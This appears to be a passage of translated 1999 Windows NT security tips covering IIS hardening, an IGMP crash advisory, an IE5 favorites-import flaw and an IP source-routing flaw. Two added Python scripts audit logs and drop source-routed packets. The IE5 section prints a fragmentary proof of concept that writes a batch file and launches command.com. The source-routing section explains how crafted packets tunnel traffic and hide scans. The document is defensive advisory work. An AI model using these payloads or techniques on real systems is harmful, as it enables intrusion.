NT Security Tips (5)

2019-03-23 10:56

Set up and use Secure Sockets Layer.

Remove components you do not use: regedit XXX.dll /u.

Delete the IISADMPWD virtual directory. It lets you reset your administrator password, which is genuinely dangerous; you are better off without it.

Remove unnecessary script mappings; .htr, .idc, .shtm, .stm and .shtml can all be removed.

Disable RDS support, since a bug in it was found recently; it is best left disabled.

Use IIS logging, recording every day the client IP address, user name, server port, method, URI stem, HTTP status and user agent.

Add checks on input to your ASP pages.

Disable "Parent Paths", i.e. do not let others use ".." to reach the directory above yours. Setting: site properties -> Home Directory -> Configuration -> App Options -> Enable Parent Paths; disable it.

Set SSIEnableCmdDirective under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters to 1 to prevent remote invocation of a command shell.
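The logging tip above only pays off if someone reads the log. The script below is an added example, not part of the original article: it parses IIS W3C extended log lines carrying the fields the tip recommends and flags requests that touch the things the other tips say to remove or disable (the IISADMPWD directory, the .htr/.idc/.shtm/.stm/.shtml mappings, ".." parent-path traversal). The log lines, IP addresses and file names are constructed for the example; the field names are the standard W3C extended log names.

```python
"""Audit IIS W3C extended log lines for requests to resources the tips say to
remove or disable. Added example; the sample log below is constructed, not real data."""
import posixpath
from collections import Counter
from urllib.parse import unquote

# Script mappings the tips recommend removing; a request for one is worth a look.
REMOVED_MAPPINGS = {".htr", ".idc", ".shtm", ".stm", ".shtml"}

# Constructed sample log in IIS W3C extended format with the recommended fields.
# IIS writes "-" for an empty field and replaces spaces inside the user agent
# with "+", so a plain whitespace split recovers the columns.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Fields: date time c-ip cs-username s-port cs-method cs-uri-stem sc-status cs(User-Agent)
1999-09-21 10:15:01 192.0.2.10 - 80 GET /default.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0)
1999-09-21 10:15:07 192.0.2.44 - 80 GET /iisadmpwd/sample.htr 404 Mozilla/4.0+(compatible;+MSIE+5.0)
1999-09-21 10:15:09 192.0.2.44 - 80 GET /scripts/..%2f..%2fprivate/config.txt 403 Mozilla/4.0+(compatible;+MSIE+5.0)
1999-09-21 10:15:12 192.0.2.44 - 80 GET /samples/query.idc 404 Mozilla/4.0+(compatible;+MSIE+5.0)
"""


def parse_w3c_log(text):
    """Yield one dict per data line, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue  # other directives carry no request data
        if fields is None:
            raise ValueError("data line before #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            raise ValueError(f"expected {len(fields)} fields, got {len(values)}: {line}")
        yield dict(zip(fields, values))


def audit_record(rec):
    """Return the reasons a single request is suspicious (empty list if none)."""
    reasons = []
    # Decode %xx escapes first so an encoded ".." or "/" is not missed.
    uri = unquote(rec.get("cs-uri-stem", "")).lower()
    if ".." in uri.replace("\\", "/").split("/"):
        reasons.append("parent-path traversal attempt")
    if "/iisadmpwd/" in uri:
        reasons.append("access to IISADMPWD virtual directory")
    ext = posixpath.splitext(uri)[1]
    if ext in REMOVED_MAPPINGS:
        reasons.append(f"request for removed script mapping {ext}")
    return reasons


def audit_iis_log(text):
    """Return one finding per suspicious request, in log order."""
    findings = []
    for rec in parse_w3c_log(text):
        reasons = audit_record(rec)
        if reasons:
            findings.append({"c-ip": rec["c-ip"], "cs-uri-stem": rec["cs-uri-stem"],
                             "sc-status": rec["sc-status"], "reasons": reasons})
    return findings


def findings_by_ip(findings):
    """Count suspicious requests per client IP so repeat offenders stand out."""
    return Counter(f["c-ip"] for f in findings)


if __name__ == "__main__":
    results = audit_iis_log(SAMPLE_LOG)
    for f in results:
        print(f["c-ip"], f["sc-status"], f["cs-uri-stem"], "->", "; ".join(f["reasons"]))
    print(findings_by_ip(results))
```

The status code is kept in each finding on purpose: a 404 for an .htr file confirms the mapping is gone, while a 200 would mean one of the tips above has not actually been applied.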

This article was adapted from a foreign article, with some deletions for domestic circumstances. If you have different views, please mail to: adam2000@21cn.com ; you are also welcome to discuss with me on the security technology forum at http://www.chinaasp.com .

NT Security Tips, Part 13

Keywords: NT, computer security

(Originally posted to the Security Technology board on 6 September 1999)

Sending fragmented IGMP packets to Windows 95, 98 and NT machines can interrupt normal operation. On 95 and 98 machines this slows the machine down or even hangs it; on NT the problem also exists, but the chance of a similar success is not very high.

Vulnerable platforms:

Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Server 4.0
Microsoft Windows NT Server 4.0, Enterprise Edition
Microsoft Windows NT Server 4.0, Terminal Server Edition

On 3 September Microsoft released a series of patches, at the following locations:

Windows 95:
This patch will be available shortly

Windows 98:
http://www.microsoft.com/windows98/downloads/corporate.asp

Windows NT Workstation 4.0; Windows NT Server 4.0; Windows NT Server, Enterprise Edition:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP5/IGMP-fix/

Windows NT Server 4.0, Terminal Server Edition:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40TSE/hotfixes-postSP5/IGMP-fix/

(Originally posted to the Security Technology board on 12 September 1999)

Have you installed and are you using IE5 on your NT server?

Microsoft recently announced a new vulnerability concerning a dangerous thing in IE 5!

This dangerous thing is in fact a function in IE5!

The function is window.external.ImportExportFavorites().

Have a look at the sample below:

In a HTML file:

------------------------------------------------------------------

------------------------------------------------------------------

In the imported file (fav.imp), residing on a samba or Windows server without authentication:

-------------------------------------------------------------------

ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT created\');window.close();'));\LAST_VISIT=\
LAST_MODIFIED=\
ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program started\');window.close()'));\
LAST_VISIT=\

-------------------------------------------------------------------

To see the effect start c:\fav.hta (it may be placed in the StartUp folder and executed automatically)

This thing can be unleashed on you by some ill-intentioned person through a web page or an email, so for individual users and servers alike it is a vulnerability that must be taken into account!

Because it can write to your files, it can overwrite your c:\command.com.

Everyone knows what harm that does, so I will not spell it out!!!

And the solution the lords at Microsoft give us is to disable your script execution; damn M$, nothing to be done!!!

(Originally posted to the Security Technology board on 21 September 1999)

Windows IP Source Routing Vulnerability

Every version of NT has this vulnerability, but if you have SP5 installed it can be dealt with by modifying the registry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DisableIPSourceRouting

If you are a 9x user, you will have to wait for the lords at Microsoft to make you a patch.

Technical details:

Every IP stack is required to implement IP options, although they may or may not appear in each IP datagram. Options are variable in length, and generally contain a type, length and data associated with the option. The option type is divided into three fields: the copied flag, option class and the option number. The copied flag indicates that this option is copied into all fragments on fragmentation. The source route option provides routing information for gateways in the delivery of a datagram to its destination. There are two variations, loose and strict routes. The loose source route (LSRR) allows any number of intermediate gateways to reach the next address in the route. The strict source route (SSRR) requires the next address in the source route to be on a directly connected network, otherwise the delivery of the datagram cannot be completed. The source route options have a variable length, containing a series of IP addresses and an offset pointer indicating the next IP address to be processed. A source routed datagram completes its delivery when the offset pointer points beyond the last field, i.e. the pointer is greater than the length, and the address in the destination address has been reached. RFC 1122 states the option as received must be passed up to the transport layer (or to ICMP message processing).

It is a common security measure to disable IP source routing. In this situation, if a source routed packet attempts to use a secure host as an intermediate router or to deliver its data to that host's application layer then the datagram should be dropped, optionally delivering an ICMP unreachable - source route failed. It is important to note that the datagram would be dropped at the network layer prior to IP reassembly and before data is passed to the application layer.

As with other operating systems (when configured to deny source routed packets), if a source routed datagram attempts to use a Windows host as an intermediate router, an ICMP source route failed message is sent. This implies that the offset pointer is not greater than the length and the destination IP address has not been reached.

When a source routed datagram completes its delivery, the offset pointer is greater than the length and the destination has been reached. If a specially crafted IP packet, with source route options, has the offset pointer set greater than the length, Windows TCP/IP stacks will accept the source routed datagram (rather than dropping it), and pass the data to the application layer for processing. The source route is reversed, delivering the reply to this datagram to the first host in the reversed route. Since the source route can be manipulated by an attacker, the first host in the reversed source route can be set to a host on the second network (accessible via the second interface, i.e. the internal network). As a result, it is possible to pass data through all Windows stacks with two network interfaces.

In addition to tunneling data, there are two scenarios which can allow an intruder to obtain information about the remote network while obscuring their origin.

The first allows any Windows host to be used to identify non-Windows hosts that have source routing enabled. A source routed datagram is created with a false source address, containing the true source address of the request and the address of a host to be scanned in the option data. Delivering this datagram, with the correct offset, to a Windows host results in the route being reversed and routed to the scanned host. If this host has source routing enabled the true source of the request will then see a response returned.

Secondly, by utilizing the above source routing technique, and masking their source address in the IP header, it is possible to scan a Windows host for open ports using standard port scanning techniques.
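The core of the technical description above is a single check: a stack that has source routing disabled must drop a datagram as soon as it sees an LSRR or SSRR option, and must not let "pointer greater than length" short-circuit that decision. The parser and policy function below are an added example, not code from the advisory or from any Windows component: they walk the IPv4 options area, decode the loose and strict source route options as RFC 791 lays them out, and return the disposition a hardened host should take. The two packets are constructed in the script (the checksum is left at zero, and the addresses are documentation ranges); the option type values 131 (LSRR) and 137 (SSRR) and the one-based pointer are the real RFC 791 encoding.

```python
"""Parse IPv4 source-route options and apply the hardened-host policy from the text.
Added example; packets are constructed inline, not captured traffic."""
import struct
from dataclasses import dataclass
from typing import List, Optional

OPT_EOL, OPT_NOP, OPT_LSRR, OPT_SSRR = 0, 1, 131, 137


def decode_option_type(t: int):
    """Split an option type byte into (copied flag, class, number), per RFC 791."""
    return (t >> 7) & 1, (t >> 5) & 3, t & 0x1F


@dataclass
class SourceRoute:
    strict: bool
    length: int           # option length byte: 3 + 4 * number of addresses
    pointer: int          # one-based offset of the next address to process
    addresses: List[str]

    @property
    def completed(self) -> bool:
        # RFC 791: the route is exhausted once the pointer points past the option.
        return self.pointer > self.length


def parse_source_routes(packet: bytes) -> List[SourceRoute]:
    """Walk the IPv4 options area and return every LSRR/SSRR option found."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or len(packet) < ihl:
        raise ValueError("bad IHL")
    opts = packet[20:ihl]
    routes, i = [], 0
    while i < len(opts):
        t = opts[i]
        if t == OPT_EOL:
            break
        if t == OPT_NOP:
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("truncated option header")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("option length runs outside the header")
        if t in (OPT_LSRR, OPT_SSRR):
            if length < 3:
                raise ValueError("source route option too short")
            data = opts[i + 3:i + length]
            addrs = [".".join(str(b) for b in data[j:j + 4])
                     for j in range(0, len(data) - len(data) % 4, 4)]
            routes.append(SourceRoute(t == OPT_SSRR, length, opts[i + 2], addrs))
        i += length
    return routes


def decide(packet: bytes, source_routing_disabled: bool = True) -> str:
    """Return the disposition a hardened stack should take for this datagram."""
    routes = parse_source_routes(packet)
    if not routes:
        return "deliver"
    # The hardened rule: with source routing disabled, the option's presence alone
    # is grounds to drop, at the network layer, before any data reaches an application.
    # The pointer value is deliberately not consulted here.
    if source_routing_disabled:
        return "drop (ICMP source route failed)"
    # Otherwise behave like a host that honours the option.
    return "deliver" if all(r.completed for r in routes) else "forward to next hop"


def build_packet(src: str, dst: str, route: Optional[List[str]] = None,
                 pointer: int = 4, strict: bool = False, payload: bytes = b"") -> bytes:
    """Construct a minimal IPv4 datagram, with one source route option if a route is given."""
    def ip(a):
        return bytes(int(x) for x in a.split("."))
    opt = b""
    if route is not None:
        data = b"".join(ip(a) for a in route)
        opt = bytes([OPT_SSRR if strict else OPT_LSRR, 3 + len(data), pointer]) + data
        opt += b"\x00" * (-len(opt) % 4)   # pad to a 32-bit boundary with EOL bytes
    ihl = 5 + len(opt) // 4
    # version/IHL, TOS, total length, id, flags/frag, TTL, protocol (UDP), checksum 0, src, dst
    hdr = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, ihl * 4 + len(payload),
                      0, 0, 64, 17, 0, ip(src), ip(dst))
    return hdr + opt + payload


# Constructed packets. CRAFTED carries a one-hop LSRR whose pointer (8) already
# exceeds its length (7): the "route already completed" shape the text describes.
CRAFTED = build_packet("192.0.2.9", "198.51.100.1", ["10.0.0.5"], pointer=8)
PLAIN = build_packet("192.0.2.9", "198.51.100.1")

if __name__ == "__main__":
    for name, pkt in (("crafted", CRAFTED), ("plain", PLAIN)):
        print(name, parse_source_routes(pkt), "->", decide(pkt))
```

Run it and the crafted packet is dropped while the plain one is delivered; flip `source_routing_disabled` to `False` and the crafted packet is delivered because its pointer says the route is complete, which is exactly the path an unpatched stack took without first asking whether source routing was allowed at all.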

Actually this vulnerability was raised a long time ago, and I have thought about it for a long time, but I have not managed to implement a concrete attack method; everyone should still find the Microsoft patch and apply it, to avoid being attacked later (perhaps someone has already started using this method against your server!).

Patch location:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/Hotfixes-PostSP5/Spoof-fix

NT Security Tips, Part 14

Keywords: NT, computer security

(Originally posted to the Security Technology board on 2 October 1999)

On Shares

Recently, tools for scanning NT have become popular in China, and NT accounts on the net are laid bare. If account management on your NT box is lax, and if you still have not removed the shares on your disks with Everyone access control, then what I want to ask is: why haven't you resigned yet???

Recently quite a few people have asked about shares, especially the special shares set up for administration; many have doubts about them, so ADAM has put together a piece on this subject for everyone's benefit, and I hope you will all show your support.

A computer's shared resources include those shared by users and administrators (such as directories), plus any special shares created by the system.

Depending on the configuration of the managed computer, some or all of the following special shares may appear in the list of shared resources that Windows NT provides. These shares are created by the system. In most cases they are not

